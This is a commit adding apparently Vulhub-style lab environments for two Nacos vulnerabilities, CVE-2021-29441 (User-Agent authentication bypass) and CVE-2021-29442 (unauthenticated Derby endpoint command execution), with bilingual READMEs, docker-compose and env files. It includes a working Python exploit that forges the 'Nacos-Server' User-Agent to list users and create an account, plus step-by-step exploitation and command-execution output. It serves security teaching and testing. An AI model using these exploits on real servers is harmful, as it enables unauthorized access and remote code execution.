first commit

nacos/CVE-2021-29441/README.md

@@ -0,0 +1,62 @@
+# Nacos Authentication Bypass(CVE-2021-29441)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nacos is a new open source project launched by Alibaba. It is a dynamic service discovery, configuration management and service management platform that makes it easier to build cloud-native applications. Committed to helping discover, configure, and manage microservices. Nacos provides a set of simple and easy-to-use feature sets that can quickly realize dynamic service discovery, service configuration, service metadata and traffic management.
+
+The vulnerability occurs when nacos will determine whether the requested user-agent is "Nacos-Server" when performing authentication and authorization operations, and if it is, it will not perform any authentication. The original intention of the developer is to handle some server-to-server requests. However, because the configuration is too simple, and the negotiated user-agent is set to Nacos-Server, it is directly hard-coded in the code, which leads to the emergence of loopholes. And by using this unauthorized vulnerability, an attacker can obtain sensitive information such as usernames and passwords.
+
+Reference links:
+
+- https://github.com/advisories/GHSA-36hp-jr8h-556f
+
+## Vulnerable environments
+
+Running vulnerability environment：
+
+```shell
+docker compose up -d
+```
+
+After the environment is running, ports 3306, 8848, 9848 and 9555 will be open. In this exploit, we only need to use port 8848, which is the web access port.**When executing the vulnerability verification process, please visit port 8848 first to confirm it is open. In some cases the nacos service will fail to start (caused by the inability to connect to the database), you can restart the nacos service or restart all services**
+
+```shell
+docker compose restart nacos
+
+```
+
+## Exploit Scripts
+
+```shell
+
+python poc.py http://target:8848
+
+```
+
+![](poc.png)
+
+## Exploit
+
+The vulnerability exploitation process is as follows.
+
+1. Change the value of User-Agent to Nacos-Server in the request package
+2. Visit http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9 to see if the status code is 200 and if the content contains `pageItems`
+3. Visit http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub to add a new user using the POST method
+4. Visit http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9 for a list of existing users
+5. Visit http://target:8848/nacos/ and log in using the new user added (vulhub/vulhub)
+
+### Detecting the presence of vulnerabilities
+
+![](1.png)
+
+After adding the Header header, visit `http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9` to see if the return value is 200 and if the content contains `pageItems`.
+
+### Adding a new user
+
+![](2.png)
+
+After adding the Header header use **POST** to request `http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub` to add a new user with the account and password of vulhub
+
+### Login using the newly created account
+
+![](3.png)

nacos/CVE-2021-29441/README.zh-cn.md

@@ -0,0 +1,58 @@
+# Nacos 认证绕过漏洞（CVE-2021-29441）
+
+Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
+
+该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。并且利用这个未授权漏洞，攻击者可以获取到用户名密码等敏感信息。
+
+参考链接：
+
+- https://github.com/advisories/GHSA-36hp-jr8h-556f
+
+## 漏洞环境
+
+运行漏洞环境：
+
+```shell
+docker compose up -d
+```
+
+环境运行后，会开放3306、8848、9848、9555端口，在本次漏洞利用中，我们只需要用到8848端口，即web访问端口。**执行漏洞验证过程时，请先访问8848端口，确认开放，某些情况下nacos服务会启动失败（无法连接数据库导致），可以重启nacos服务或者重启所有服务**
+
+```shell
+docker compose restart nacos
+
+```
+
+## 漏洞利用脚本
+
+```shell
+
+python poc.py http://target:8848
+
+```
+
+![poc](poc.png)
+
+## 漏洞复现
+
+漏洞利用过程如下：
+
+1. 修改User-Agent的值为Nacos-Server到请求包中
+2. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9查看状态码是否为200，且内容中是否包含`pageItems`
+3. 使用POST方式访问http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub添加一个新用户
+4. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9获取已有的用户列表
+5. 访问http://target:8848/nacos/，使用添加的新用户(vulhub/vulhub)进行登录
+
+### 检测漏洞是否存在
+
+![1](1.png)
+添加Header头后访问`http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9`可以看到返回值为200,且内容中是否包含`pageItems`
+
+### 添加新用户
+
+![2](2.png)
+添加Header头后使用**POST**方式请求`http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub`添加一个新用户,账号密码都为vulhub
+
+### 使用新建的账号进行登录
+
+![3](3.png)

nacos/CVE-2021-29441/docker-compose.yml

@@ -0,0 +1,26 @@
+version: "2"
+services:
+  nacos:
+    image: nacos/nacos-server:1.4.0
+    container_name: nacos-standalone-mysql
+    env_file:
+      - ./env/nacos-standlone-mysql.env
+    volumes:
+      - ./standalone-logs/:/home/nacos/logs
+      - ./init.d/nacos.properties:/home/nacos/init.d/custom.properties
+    ports:
+      - "8848:8848"
+      - "9848:9848"
+      - "9555:9555"
+    depends_on:
+      - mysql
+    restart: on-failure
+  mysql:
+    container_name: mysql
+    image: nacos/nacos-mysql:5.7
+    env_file:
+      - ./env/mysql.env
+    volumes:
+      - ./mysql:/var/lib/mysql
+    ports:
+      - "3306:3306"

nacos/CVE-2021-29441/env/mysql.env

@@ -0,0 +1,5 @@
+MYSQL_ROOT_PASSWORD=root
+MYSQL_DATABASE=nacos_devtest
+MYSQL_USER=nacos
+MYSQL_PASSWORD=nacos
+NACOS_AUTH_ENABLE=true

nacos/CVE-2021-29441/env/nacos-standlone-mysql.env

@@ -0,0 +1,10 @@
+PREFER_HOST_MODE=hostname
+MODE=standalone
+SPRING_DATASOURCE_PLATFORM=mysql
+MYSQL_SERVICE_HOST=mysql
+MYSQL_SERVICE_DB_NAME=nacos_devtest
+MYSQL_SERVICE_PORT=3306
+MYSQL_SERVICE_USER=nacos
+MYSQL_SERVICE_PASSWORD=nacos
+MYSQL_SERVICE_DB_PARAM=characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true&useSSL=false
+NACOS_AUTH_ENABLE=true

nacos/CVE-2021-29441/init.d/nacos.properties

@@ -0,0 +1,18 @@
+#spring.security.enabled=false
+#management.security=false
+#security.basic.enabled=false
+#nacos.security.ignore.urls=/**
+#management.metrics.export.elastic.host=http://localhost:9200
+# metrics for prometheus
+management.endpoints.web.exposure.include=*
+# metrics for elastic search
+#management.metrics.export.elastic.enabled=false
+#management.metrics.export.elastic.host=http://localhost:9200
+
+# metrics for influx
+#management.metrics.export.influx.enabled=false
+#management.metrics.export.influx.db=springboot
+#management.metrics.export.influx.uri=http://localhost:8086
+#management.metrics.export.influx.auto-create-db=true
+#management.metrics.export.influx.consistency=one
+#management.metrics.export.influx.compressed=true

nacos/CVE-2021-29441/poc.py

@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import sys
+
+import requests
+
+headers = {
+    "User-Agent": "Nacos-Server"
+}
+
+
+def check(target):
+    endpoint = "/nacos/v1/auth/users?pageNo=1&pageSize=9"
+    r = requests.get(target.strip("/") + endpoint, headers=headers)
+    if r.status_code == 200 and "pageItems" in r.text:
+        print target + " has vulnerabilities"
+        return True
+    print target + "has not vulnerabilities"
+    return False
+
+
+def add_user(target):
+    add_user_endpoint = "/nacos/v1/auth/users?username=vulhub&password=vulhub"
+
+    r = requests.post(target.strip("/") + add_user_endpoint, headers=headers)
+    if r.status_code == 200 and "create user ok" in r.text:
+        print "Add User Success"
+        print "New User Info: vulhub/vulhub"
+        print "Nacos Login Endpoint: {}/nacos/".format(target)
+        exit(1)
+
+    print "Add User Failed"
+
+
+if __name__ == '__main__':
+    if len(sys.argv) != 2:
+        print "Please specify the target: python poc.py http://xxxxx:8848"
+        exit(-1)
+    if check(sys.argv[1]):
+        add_user(sys.argv[1])

nacos/CVE-2021-29441/requirements.txt

@@ -0,0 +1 @@
+requests==2.26.0

nacos/CVE-2021-29442/README.md

@@ -0,0 +1,41 @@
+# Alibaba Nacos Authentication Bypass and Remote Code Execution (CVE-2021-29442)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management.
+
+In the Nacos version before 1.4.1, some API endpoints such as `/nacos/v1/cs/ops/derby` are not protected and can be openly accessed by unauthenticated users. Attackers are able to execute arbitrary SQL statement and Java code.
+
+References:
+
+- <https://github.com/advisories/GHSA-xv5h-v7jh-p2qh>
+- <https://github.com/alibaba/nacos/issues/4463>
+- <https://github.com/ayoundzw/nacos-poc>
+- <http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce>
+
+## Vulnerable environment
+
+Execute following command to start a Alibaba Nacos 1.4.0:
+
+```
+docker compose up -d
+```
+
+After server is started, brwose the `http://your-ip:8848/nacos/` you will see the default login page of Nacos.
+
+## Exploit
+
+Execute [POC](poc.py) to exploit the issue, the `-t` parameter specifies the target address, the `-c` parameter specifies the command to be executed:
+
+```
+python poc.py -t http://your-ip:8848 -c "ps aux"
+```
+
+And you will see the `ps aux` is executed successfully:
+
+```json
+{"code":200,"message":null,"data":""}
+{"code":200,"message":null,"data":[{"B":0,"A":"USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMANDroot           1  0.0  0.0 814608  4992 ?        Ss   18:47   0:00 [rosetta] /bin/bash /bin/bash bin/docker-startup.shroot          31 25.5  7.5 10414040 1534908 ?    Sl   18:47   1:14 [rosetta] /usr/lib/jvm/java-1.8.0-openjdk/bin/java /usr/lib/jvm/java-1.8.0-openjdk/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9555 -Xms2g -Xmx2g -Xmn1g -Dnacos.standalone=true -Dnacos.core.auth.enabled=true -Dnacos.member.list= -Djava.ext.dirs=/usr/lib/jvm/java-1.8.0-openjdk/jre/lib/ext:/usr/lib/jvm/java-1.8.0-openjdk/lib/ext:/home/nacos/plugins/health:/home/nacos/plugins/cmdb:/home/nacos/plugins/mysql -Xloggc:/home/nacos/logs/nacos_gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dnacos.home=/home/nacos -jar /home/nacos/target/nacos-server.jar --spring.config.location=/home/nacos/init.d/,file:/home/nacos/conf/,classpath:/,classpath:/config/,file:./,file:./config/ --spring.config.name=application,custom --logging.config=/home/nacos/conf/nacos-logback.xml --server.max-http-header-size=524288root         406  0.0  0.0 854552  5504 ?        R    18:51   0:00 ps aux"}]}
+```
+
+![](1.png)

nacos/CVE-2021-29442/README.zh-cn.md

@@ -0,0 +1,39 @@
+# Alibaba Nacos 未授权接口命令执行漏洞（CVE-2021-29442）
+
+Nacos 是一个设计用于动态服务发现、配置和服务管理的易于使用的平台。
+
+在Nacos 1.4.1之前的版本中，一些API端点（如`/nacos/v1/cs/ops/derby`）可以默认没有鉴权，可以被未经身份验证的用户公开访问。攻击者可以利用该漏洞执行任意Derby SQL语句和 Java 代码。
+
+参考资料：
+
+- <https://github.com/advisories/GHSA-xv5h-v7jh-p2qh>
+- <https://github.com/alibaba/nacos/issues/4463>
+- <https://github.com/ayoundzw/nacos-poc>
+- <http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce>
+
+## 漏洞环境
+
+执行如下命令启动一个 Alibaba Nacos 1.4.0服务器：
+
+```
+docker compose up -d  
+```
+
+服务器启动后，访问`http://your-ip:8848/nacos/`可以看到 Nacos 的默认登录页面。
+
+## 漏洞复现
+
+执行[POC](poc.py)，`-t`参数指定目标地址，`-c`参数指定要执行的命令：
+
+```
+python poc.py -t http://your-ip:8848 -c "ps aux"  
+```
+
+`ps aux`命令成功执行后会收到如下响应：
+
+```json
+{"code":200,"message":null,"data":""}
+{"code":200,"message":null,"data":[{"B":0,"A":"USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMANDroot           1  0.0  0.0 814608  4992 ?        Ss   18:47   0:00 [rosetta] /bin/bash /bin/bash bin/docker-startup.shroot          31 25.5  7.5 10414040 1534908 ?    Sl   18:47   1:14 [rosetta] /usr/lib/jvm/java-1.8.0-openjdk/bin/java /usr/lib/jvm/java-1.8.0-openjdk/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9555 -Xms2g -Xmx2g -Xmn1g -Dnacos.standalone=true -Dnacos.core.auth.enabled=true -Dnacos.member.list= -Djava.ext.dirs=/usr/lib/jvm/java-1.8.0-openjdk/jre/lib/ext:/usr/lib/jvm/java-1.8.0-openjdk/lib/ext:/home/nacos/plugins/health:/home/nacos/plugins/cmdb:/home/nacos/plugins/mysql -Xloggc:/home/nacos/logs/nacos_gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dnacos.home=/home/nacos -jar /home/nacos/target/nacos-server.jar --spring.config.location=/home/nacos/init.d/,file:/home/nacos/conf/,classpath:/,classpath:/config/,file:./,file:./config/ --spring.config.name=application,custom --logging.config=/home/nacos/conf/nacos-logback.xml --server.max-http-header-size=524288root         406  0.0  0.0 854552  5504 ?        R    18:51   0:00 ps aux"}]}
+```
+
+![](1.png)

nacos/CVE-2021-29442/docker-compose.yml

@@ -0,0 +1,7 @@
+version: "2"
+services:
+  web:
+    image: vulhub/nacos:1.4.0
+    ports:
+      - "8848:8848"
+      - "5005:5005"